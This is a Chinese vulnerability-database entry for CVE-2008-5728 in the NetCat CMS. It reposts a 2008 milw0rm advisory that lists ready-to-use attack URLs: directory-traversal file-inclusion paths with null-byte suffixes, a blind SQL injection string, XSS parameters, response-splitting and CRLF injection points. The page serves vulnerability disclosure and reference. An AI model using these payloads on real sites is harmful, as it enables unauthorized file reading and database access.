AIST Netcat 多文件参数目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117149 漏洞类型 路径遍历
发布时间 2008-12-23 更新时间 2009-01-29
CVE编号 CVE-2008-5728 CNNVD-ID CNNVD-200812-452
漏洞平台 PHP CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/7560
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-452
|漏洞详情
Netcat是一款简单的Unix工具,使用UDP和TCP协议。它是一个可靠的容易被其他程序所启用的后台操作工具,同时它也被用作网络的测试工具或黑客工具。AISTNetCat3.12及其早期版本中存在多个目录遍历漏洞,当magic_quotes_gpc被中止且register_globals被激活时,远程攻击者可以借助(1)modules/netshop/post.php中的系统参数;(2)auth.inc.php,(3)banner.inc.php,(4)blog.inc.php,以及(5)modules/中的forum.inc.php的INCLUDE_FOLDER参数的..,以包含和执行任意本地文件。
|漏洞EXP
NetCat <= 3.12 Multiple Remote Vulnerabilities

The description:
The set vulnerability in CMS NetCat versions 3.12 and more low was revealed.

1. Multiple File Including Vulnerabilities

Vulnerability exists for the reason that direct access to some files, around logicians of work of the appendix is possible.
It gives the chance to redefine internal variables which are transferred as arguments in function include ().
Examples of vulnerable files:
/netcat/modules/netshop/post.php?system=../../../../.htaccess%00
/netcat/modules/auth.inc.php?INCLUDE_FOLDER=../../.htaccess%00
/netcat/modules/banner.inc.php?INCLUDE_FOLDER=../../.htaccess%00
/netcat/modules/blog.inc.php?INCLUDE_FOLDER=../../.htaccess%00
/netcat/modules/forum.inc.php?INCLUDE_FOLDER=../../.htaccess%00

The note:
For vulnerability operation the following options PHP are required: register_globals=On and magic_quotes_gpc=Off

2. Blind SQL Injection Vulnerabilities

Examples of vulnerable files:
/netcat/modules/auth/password_recovery.php?=1'SQL_code

Example:
/netcat/modules/auth/password_recovery.php?=1'/**/OR/**/VERSION()/**/LIKE/**/'4%'/*

The note:
For vulnerability operation the following options PHP are required:magic_quotes_gpc=Off

3. Multiple Cross-site Scripting Vulnerabilities

Examples of vulnerable files: 
/netcat/admin/siteinfo/iframe.inc.php?path=http://ha.ckers.org/scriptlet.html" 
/netcat/FCKeditor/neditor.php?form=<XSS>&control=<XSS> etc.

4. HTTP Response Splitting

Examples of vulnerable files: 
/netcat/modules/auth/index.php?logoff=1&redirect=http://www.google.com 
/netcat/modules/linkmanager/redirect.php?url=http://www.google.com

5. CRLF injection 

Vulnerability exists at the moment of value installation %0a in COOKIEvariables.
Vulnerability has been found out at the reference to a file /netcat/add.php.

# milw0rm.com [2008-12-23]
|参考资料

来源:XF
名称:netcat-includefolder-file-include(47576)
链接:http://xforce.iss.net/xforce/xfdb/47576
来源:BID
名称:32992
链接:http://www.securityfocus.com/bid/32992
来源:MILW0RM
名称:7560
链接:http://www.milw0rm.com/exploits/7560
来源:SREASON
名称:4819
链接:http://securityreason.com/securityalert/4819